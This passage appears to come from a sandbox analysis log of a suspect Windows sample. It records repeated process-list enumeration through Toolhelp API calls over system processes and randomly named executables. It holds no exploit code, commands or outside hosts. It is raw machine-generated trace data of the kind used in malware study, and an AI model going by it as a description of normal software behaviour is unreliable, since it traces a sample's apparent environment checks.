cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0101.783] CloseHandle (hObject=0xbc) returned 1 [0101.783] Sleep (dwMilliseconds=0x12c) [0102.111] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0102.116] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.117] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.118] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.119] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.120] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.121] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.122] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.123] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.124] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.125] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.126] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.127] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.128] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.129] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.130] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.131] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.132] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.133] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.134] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.135] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.136] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.138] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.139] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.140] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.141] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.142] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.143] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.145] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.146] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.147] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0102.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0102.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0102.192] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0102.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0102.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0102.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0102.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0102.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0102.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0102.199] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0102.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0102.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0102.202] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0102.204] CloseHandle (hObject=0xc4) returned 1 [0102.204] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0102.209] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0102.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0102.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0102.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0102.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0102.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0102.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0102.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0102.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.221] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.222] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0102.222] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0102.267] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.268] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.270] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0102.271] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0102.272] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0102.273] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0102.274] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0102.275] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0102.276] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0102.278] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0102.279] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0102.280] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0102.281] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0102.282] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0102.284] Process32NextW (in: hSnapshot=0xbc, 